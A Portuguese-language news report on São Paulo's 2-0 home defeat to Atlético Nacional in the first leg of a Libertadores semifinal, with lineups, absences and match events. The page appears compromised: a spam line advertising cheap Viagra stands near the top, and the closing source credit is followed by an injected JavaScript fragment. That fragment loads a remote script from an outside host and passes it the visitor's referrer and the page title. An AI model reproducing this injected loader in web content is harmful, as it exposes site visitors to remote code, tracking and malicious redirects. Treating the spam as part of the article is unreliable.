Destaque

Com um jogador a menos, Tricolor é derrotado pelo Atlético Nacional


Buy cheap Viagra online

O Tricolor não conquistou a vitória, viu o Atlético Nacional-COL largar na frente no duelo de ida da semifinal da Libertadores da América, mas o reconhecimento da torcida veio após o apito final. Na noite desta quarta-feira (6), no Morumbi, o São Paulo foi derrotado por 2 a 0, porém contou mais uma vez com um verdadeiro show dos torcedores nas arquibancadas, que fizeram questão de demonstrar o amor pelo clube e aplaudiu os atletas mesmo com o revés.

Com apenas dez jogadores após a expulsão de Maicon, o Tricolor não conseguiu segurar o ímpeto do adversário e agora terá que vencer por três gols de diferença para avançar até a grande decisão. Em caso de triunfo por 2 a 0 – placar do confronto de ida – na próxima semana, o vencedor será definido nas cobranças de penalidades máximas. Antes de encarar o Atlético Nacional novamente, porém, o São Paulo enfrentará o América-MG no domingo (10), no Cícero Pompeu de Toledo.

Para encarar os colombianos, o Tricolor contou com a volta do chileno Mena (recuperado de lesão muscular). Dessa forma, o técnico Edgardo Bauza escalou o time com Denis; Bruno, Maicon, Rodrigo Caio e Mena; João Schmidt, Thiago Mendes e Ytalo; Wesley, Michel Bastos e Calleri. Já o adversário começou a partida com Armani; Bocanegra, Sánchez, Henriquez e Diaz; Pérez, Mejia e Torres; Moreno, Borja e Ibargüen.

Não estavam à disposição: Lucas Fernandes, Breno e Wellington (cirurgias de ligamento cruzado), Kelvin (estiramento no músculo da coxa esquerda), Centurión (suspenso), Paulo Henrique Ganso (estiramento na coxa direita) e Renan Ribeiro (lombalgia). Vale lembrar que o peruano Cueva, contratado recentemente, não pode defender o São Paulo na edição deste ano por já ter atuado pelo Toluca-MEX.

Quando a bola rolou, empurrado pela festa da torcida nas arquibancadas, o Tricolor tratou de partir para cima do rival e pressionou nos instantes iniciais. Os brasileiros tentaram sufocar os colombianos e buscaram as jogadas na frente, enquanto o Atlético Nacional-COL apostava nos contragolpes. Aos 12 minutos, Mena fez o cruzamento da esquerda, Wesley dominou livre no lado direito, bateu forte, mas a bola subiu muito. Três minutos depois, Michel cobrou escanteio, a zaga afastou, mas Thiago Mendes ficou com a sobra. O volante arriscou de longe e exigiu boa defesa do goleiro.


Apesar de começar melhor, o time são-paulino não conseguiu impedir que os visitantes esfriassem a partida. Os colombianos conseguiram cadenciar a partida, trocaram passes para conter as investidas do São Paulo e protegeram a meta. Assim, somente na reta final do primeiro tempo os anfitriões assustaram novamente. Aos 43 minutos, Calleri escorou de cabeça, Michel Bastos emendou a bomba de primeira, e Armani fez boa defesa! 0 a 0 antes do intervalo.

Na volta para a segunda etapa, o adversário adotou uma postura mais aguda e assustou algumas vezes. Então, para tentar mudar o panorama do confronto, Patón apostou na entrada do centroavante Alan Kardec no lugar de Ytalo. Depois, aos 25, substituiu João Schmidt por Daniel. As alterações deram mais ofensividade ao Tricolor, que por pouco não balançou as redes aos 27 minutos: Michel Bastos recebeu no lado esquerdo, invadiu a área, bateu cruzado, e Armani fez boa defesa.

E justamente quando tentava reagir, o time são-paulino sofreu um duro golpe aos 28: o zagueiro Maicon recebeu cartão vermelho após se desentender com Miguel Borja. Com inferioridade numérica em campo, Bauza colocou Hudson na vaga de Wesley e tentou proteger o sistema defensivo. Porém, aos 36, o Tricolor não conseguiu resistir ao ímpeto do rival e sofreu o gol o time colombiano marcado por Borja. Já nos instantes finais, aos 43, Borja marcou mais um e fechou o placar na capital paulista: 2 a 0.

Fonte: SiteOficials.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;